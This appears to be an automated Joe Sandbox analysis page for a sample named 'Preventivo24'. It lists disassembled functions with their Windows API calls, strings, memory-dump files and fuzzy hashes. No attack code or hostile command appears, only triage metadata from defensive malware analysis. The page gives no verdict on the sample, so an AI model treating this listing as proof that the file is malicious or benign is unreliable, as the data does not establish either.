Instruction Fuzzy Hash: 29227B70D00209DFEB25EFA8CD59BEEBBB4AF14304F244199E455B7281DBB46A88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EA5220 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 725fileCOMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000), ref: 00EA536F
PathIsUNCW.SHLWAPI(00000000,*.*,00000000), ref: 00EA5436
FindFirstFileW.KERNEL32(00000000,?,*.*,00000000), ref: 00EA55C9
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA55E3
GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 00EA5620
FindClose.KERNEL32(00000000), ref: 00EA5684
SetLastError.KERNEL32(0000007B), ref: 00EA568E
PathIsUNCW.SHLWAPI(?,?,B5580983,*.*,?), ref: 00EA58F4

Strings

*.*, xrefs: 00EA5398, 00EA5403, 00EA5404, 00EA5816
\\?\UNC\, xrefs: 00EA5456, 00EA5531, 00EA5916, 00EA59F5
\\?\, xrefs: 00EA5547, 00EA55B3, 00EA5A0E, 00EA5A79

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Path$Find$CloseFullName$ErrorFileFirstLast
String ID: *.*$\\?\$\\?\UNC\
API String ID: 2310598285-1700010636
Opcode ID: 69bf733149b79a5f00bece6b5d0d6157b01a343ee54237aa20a3087de4da8f67
Instruction ID: b04a9826ce84ab996b9b570f6a5a28f1400edbba9829a567b562e83e42010ddb
Opcode Fuzzy Hash: 69bf733149b79a5f00bece6b5d0d6157b01a343ee54237aa20a3087de4da8f67
Instruction Fuzzy Hash: 0A42D032A00A05CFCB14DF68C8887AEB7B1FF59328F144269E815AF391D735AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9280 Relevance: 16.6, APIs: 11, Instructions: 119
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00FB92D2
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00FB92DF
GetLastError.KERNEL32 ref: 00FB92E9
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00FB930D
GetLastError.KERNEL32 ref: 00FB9317
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00FB933D
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9374
EqualSid.ADVAPI32(00000000,?), ref: 00FB9383
FreeSid.ADVAPI32(?), ref: 00FB9392
FindCloseChangeNotification.KERNEL32(00000000), ref: 00FB93CC

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
String ID:
API String ID: 2037597787-0
Opcode ID: 61fa54b873924569b3c2a0a0a80c3ea5416fc0c06f420f05941c8e2bead50393
Instruction ID: 8959ef4148347696df5eb4b1c1dd02738dde6bdd59926c0eb40628afdf6b4406
Opcode Fuzzy Hash: 61fa54b873924569b3c2a0a0a80c3ea5416fc0c06f420f05941c8e2bead50393
Instruction Fuzzy Hash: FB413471D05209EFDF249FA1D949BEEBBB8FF09314F144129E522B2280D7B95944DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E81490 Relevance: 13.9, Strings: 11, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

AI_CF_FRAME_BORDER3_COLORS, xrefs: 00E81665
AI_CF_FRAME_CAPTION2_COLORS, xrefs: 00E8150A
AI_CF_CLOSEBTN_BASE_COLOR, xrefs: 00E8158E
AI_CF_FRAME_BASE_COLOR, xrefs: 00E814CC
AI_CF_FRAME_BORDER2_COLORS, xrefs: 00E81612
AI_CF_CLOSEBTN_BORDER_COLORS, xrefs: 00E8172F
AI_CF_CLOSEBTN_COLORS, xrefs: 00E816FC
AI_CF_MINBTN_BASE_COLOR, xrefs: 00E8154C
AI_CF_FRAME_BORDER1_COLORS, xrefs: 00E815D0
AI_CF_MINBTN_COLORS, xrefs: 00E81696
AI_CF_MINBTN_BORDER_COLORS, xrefs: 00E816C9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: AI_CF_CLOSEBTN_BASE_COLOR$AI_CF_CLOSEBTN_BORDER_COLORS$AI_CF_CLOSEBTN_COLORS$AI_CF_FRAME_BASE_COLOR$AI_CF_FRAME_BORDER1_COLORS$AI_CF_FRAME_BORDER2_COLORS$AI_CF_FRAME_BORDER3_COLORS$AI_CF_FRAME_CAPTION2_COLORS$AI_CF_MINBTN_BASE_COLOR$AI_CF_MINBTN_BORDER_COLORS$AI_CF_MINBTN_COLORS
API String ID: 0-1938184520
Opcode ID: 191259035799afa3b382c943686b6dd96b25382fe1a2ea5d2297fee375077b94
Instruction ID: d58c8d781197a2fd68a22195094c185be4579afd5de7c92431de82e031f043f5
Opcode Fuzzy Hash: 191259035799afa3b382c943686b6dd96b25382fe1a2ea5d2297fee375077b94
Instruction Fuzzy Hash: E9A16D70D45399DAEB60DF65C949BDDBBB0AF16308F108289E4483B281DBB91BC8DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FC0CA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ComCtl32.dll,B5580983,?,00000000,00000000), ref: 00FC0CDA
GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00FC0D00
FreeLibrary.KERNEL32(00000000), ref: 00FC0D89

Strings

ComCtl32.dll, xrefs: 00FC0CCE
LoadIconMetric, xrefs: 00FC0CFA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ComCtl32.dll$LoadIconMetric
API String ID: 145871493-764666640
Opcode ID: cff6c63f94b65668290379668171cc66a801d3db8a68efe0939b686b15068f2e
Instruction ID: c4cbf96ba0fcb4c8f4128862d59e2a1199600298cb585d0a086547dd688cfb06
Opcode Fuzzy Hash: cff6c63f94b65668290379668171cc66a801d3db8a68efe0939b686b15068f2e
Instruction Fuzzy Hash: 38319F71A00219EFCB188F95C919BAFBBB8FB45750F000229FC25A3380DB359D01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF4BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FF4CBA

Strings

\, xrefs: 00FF4C3C
\, xrefs: 00FF4C5E
\, xrefs: 00FF4C34

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DiskFreeSpace
String ID: \$\$\
API String ID: 1705453755-3791832595
Opcode ID: d88349a442f7fd43080b5d07339f2d7d6ab65481341e54af04b178ed09b0cdf9
Instruction ID: 319bb1c666377f942e84193df7daccdc8b2f23dcd8faaf2b2bf7b30c9f7faf0c
Opcode Fuzzy Hash: d88349a442f7fd43080b5d07339f2d7d6ab65481341e54af04b178ed09b0cdf9
Instruction Fuzzy Hash: C5410622E15219CACB30DF2484406BBB7F4FF95364F155A2EEAD8D3160F761ADC49386

Uniqueness

Uniqueness Score: -1.00%

Function 00EAF6F0 Relevance: 6.8, Strings: 5, Instructions: 569COMMON

Download Yara Rule

Strings

MultipleInstancesProps, xrefs: 00EAF820, 00EAFC8E
AI_EXIST_INSTANCES, xrefs: 00EAF973
AI_EXIST_NEW_INSTANCES, xrefs: 00EAFAD9
PropertyValue, xrefs: 00EAFD98
MultipleInstances, xrefs: 00EAF756

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
API String ID: 0-2308371840
Opcode ID: 25b6d2c7003f804161a159aff56546011cd1ad2ea92b67647be5751552771e4a
Instruction ID: d5a1d875a4186e5dd7f3aa066372afc72bae7cf7bf55e6fa932185fc4684a3db
Opcode Fuzzy Hash: 25b6d2c7003f804161a159aff56546011cd1ad2ea92b67647be5751552771e4a
Instruction Fuzzy Hash: C032F170E00248DFDB18DFA4CD59BEEBBB1BF49314F248259E405BB281DB746A84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9080 Relevance: 6.6, APIs: 4, Instructions: 644fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

FindFirstFileW.KERNEL32(?,?,00000000,00000000,?,?), ref: 00FE94BF
FindClose.KERNEL32(00000000), ref: 00FE9503
CloseHandle.KERNEL32(?,?), ref: 00FE9801

Part of subcall function 0100A2E0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,B5580983,?,?,?,?,?,?,010E5C7D), ref: 0100A344

CloseHandle.KERNEL32(?,?), ref: 00FE99CB

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Close$FileFindHandle$CreateFirstHeapProcess
String ID:
API String ID: 1937692618-0
Opcode ID: ce0bb8898bd71a5d090e4c7abcafa6aa0c69cfd336e7094b7859e45c305d7ba7
Instruction ID: 14e66a28a7d5714098910191ec5ef93deadff3501b1f420449e0d615b841a460
Opcode Fuzzy Hash: ce0bb8898bd71a5d090e4c7abcafa6aa0c69cfd336e7094b7859e45c305d7ba7
Instruction Fuzzy Hash: 2C528930D04A98CFDB24CB28CD547AEBBB1AF49315F1482D9D819A7382DB74AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5910 Relevance: 6.3, APIs: 4, Instructions: 328memoryCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,?,?,00000100), ref: 00FC5A13
LoadStringW.USER32(?,?,?,00000001), ref: 00FC5B33
SysFreeString.OLEAUT32(00000000), ref: 00FC5CCE
SysAllocStringLen.OLEAUT32(?,?), ref: 00FC5CF5

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: String$Load$AllocFree
String ID:
API String ID: 1561515232-0
Opcode ID: 74f88f926ffefa5f5956874890f62cc9f06982258cf6505dbff5d043b81562c0
Instruction ID: b788acf5c88c17e4e0bea721a8958d810027cdf0167a5edcc764f2209f7e33f5
Opcode Fuzzy Hash: 74f88f926ffefa5f5956874890f62cc9f06982258cf6505dbff5d043b81562c0
Instruction Fuzzy Hash: DDC1A071D00649DFDB04DFA8C945BEEBBB5FF44314F24822EE415AB280EB746A84DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0108A23A Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,00FEBA31,?,?,?), ref: 0108A23F
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0108A246
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 0108A28C
HeapFree.KERNEL32(00000000,?,?,?), ref: 0108A293

Part of subcall function 0108A0D8: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0108A282,?,?,?,?), ref: 0108A0FC
Part of subcall function 0108A0D8: HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 0108A103

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 134e8d93fd8a121d9ab060e0c9e4400d803d57d448fde5372db14eac7f0043a1
Instruction ID: 9973d1beabd67555658412b604b091fe39e15627fbffbe4c8bda3d0ec87cd539
Opcode Fuzzy Hash: 134e8d93fd8a121d9ab060e0c9e4400d803d57d448fde5372db14eac7f0043a1
Instruction Fuzzy Hash: F9F0F07270C322D7C77936BC7D0895B7A64ABC1A61701487AF4D6C3688CE21C8418760

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD700 Relevance: 4.6, APIs: 3, Instructions: 92fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,00000000), ref: 00FBD79F
FindClose.KERNEL32(00000000), ref: 00FBD7FE

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Find$AllocateCloseFileFirstHeap
String ID:
API String ID: 1673784098-0
Opcode ID: 698c9f14846b31c07112aa215b107677127bf7d968355893256e9ff61853c2f2
Instruction ID: 7f195e53a3915e82bc9b32d69a3791f441d44d42dfadb762412d3523ccbdcf46
Opcode Fuzzy Hash: 698c9f14846b31c07112aa215b107677127bf7d968355893256e9ff61853c2f2
Instruction Fuzzy Hash: 8C31E331904208CBCB28DF56C948BDAB7B8EB48320F2082ADE91997380E7359D44DF42

Uniqueness

Uniqueness Score: -1.00%

Function 00F773D0 Relevance: 3.2, APIs: 2, Instructions: 234libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F77412

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

LoadLibraryExW.KERNEL32(?,00000000,00000000,010EB76D,000000FF), ref: 00F774E9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DirectoryFindHeapLibraryLoadProcessResourceSystem
String ID:
API String ID: 2891229163-0
Opcode ID: a011087b38ddb3615ad9f4a8f465981a60f35bc7b42040748c9d549efeaa00f6
Instruction ID: a6662d7a7a464aa9ca7783e9eed44183a3bc49bf279f0a2d9abf8d6c7c294ab1
Opcode Fuzzy Hash: a011087b38ddb3615ad9f4a8f465981a60f35bc7b42040748c9d549efeaa00f6
Instruction Fuzzy Hash: 48A17BB0904705EFE714DF64C858B9ABBF0FB04318F14825ED8699B781D7BAA618CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01003AD0 Relevance: 3.1, APIs: 2, Instructions: 92filepipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,00000000,B5580983,?,?,00000000), ref: 01003B5B
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,00000000,B5580983,?,?,00000000), ref: 01003B81

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Create$FileNamedPipe
String ID:
API String ID: 1328467360-0
Opcode ID: a87d246cfd7bf89ad82874abb1546fb38ddc1ce13e3e5591c80dc4827721016b
Instruction ID: b6ec130f1fe87af75b175d2b8265177b76ec34457da308dc151d4b88d05b6fc0
Opcode Fuzzy Hash: a87d246cfd7bf89ad82874abb1546fb38ddc1ce13e3e5591c80dc4827721016b
Instruction Fuzzy Hash: 5531D531A44746AFE7228F28DC01B99FBA5FB05720F10866EF665AB7C0D775A500CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2520 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__set_se_translator.LIBVCRUNTIME ref: 00EC2538
SetUnhandledExceptionFilter.KERNEL32(00FBC550), ref: 00EC254E

Memory Dump Source

